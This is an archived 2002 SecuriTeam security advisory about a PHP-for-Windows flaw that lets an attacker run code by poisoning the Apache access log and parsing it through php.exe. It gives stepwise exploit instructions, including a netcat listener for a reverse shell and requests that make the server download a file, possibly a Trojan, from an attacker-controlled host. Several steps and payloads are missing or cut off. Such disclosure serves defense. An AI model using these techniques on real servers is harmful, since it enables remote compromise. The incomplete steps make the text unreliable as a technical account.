[NT] Gaining Root Access via PHP.exe

From: support@securiteam.com
Date: 01/23/02

From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 23 Jan 2002 13:36:39 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Gaining Root Access via PHP.exe


A major security vulnerability has been found in PHP for Windows, the
vulnerability would allow an attacker exploiting PHP's ability to view
files that reside outside the normal HTML root directory to execute
arbitrary code by inserting into the Apache log file a malicious PHP based


Vulnerable systems:
PHP version 4.0 with Apache Server version 2.0

Exploit (Executing a command):
Assume that a user has installed apache in the location "c:\apache" and
that php.exe was installed in the default path of "c:\php\php.exe", the
exploit steps to gain root are as follows:
In the browser, you type the following:
1) http://www.example.com/('thecommandtoexecutewithpath');%20?>
Apache will then add this request line to the access.log file. By
requesting the log file with the php.exe exploit you can then run the php
system code like this :
This will run the php code mentioned above.
The way root is gained is by getting the webserver to do a reverse telnet
back to your server running netcat such as the command:
"nc -l -n -v -p "
As you can see, this is a very simple way to compromise the entire server
with the php.exe exploit.

Exploit (Uploading a file):
1) Create a text file on your webserver called mytestfile.txt
2) Write a short line of text in it.
3) Check how big the file is (in bytes).
4) Test that the file can be accessed via your browser by typing
5) Check that the file exist on server by typing
http://www.example.com/mytestfile.txt into your browser.
6) You now have to make 4 requests (If the browser does not seem to
connect, do not worry, it is. do not press refresh in any step, otherwise
this will not work. Remember to replace the brackets on the first two

7) Make the request in your browser
http://www.example.com/("http://[YOUR_SERVER_IP]/mytestfile.txt"," rb");?>

8) Wait for about 10 Seconds
9) Make the request in your browser

10) Wait for about 10 Seconds
11) Make the request in your browser

12) Wait for about 10 Seconds
13) Make the request in your browser

14) Wait for about 10 Seconds
15) Make a request for a non-existent file (To flush the access log) by
16) Wait for about 10 seconds

17) Get php.exe to parse the apache logfile by typing

18) Press Refresh to make sure the log file has been parsed.
19) Check for the file on server by typing in your browser

What happens is that php.exe runs the php code that has been logged in the
apache log file. The code in the apache log file then tells the server to
download the file from your server and save it into the apache directory.

The file uploaded can be a Trojan, exe file, php file, etc. There is no
limitation to what and where you can upload.

It is a very simple task to write a Trojan with CGI headers and to execute
it once uploaded.


The information has been provided by
<mailto:brereton_paul@btopenworld.com> Paul Brereton.


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.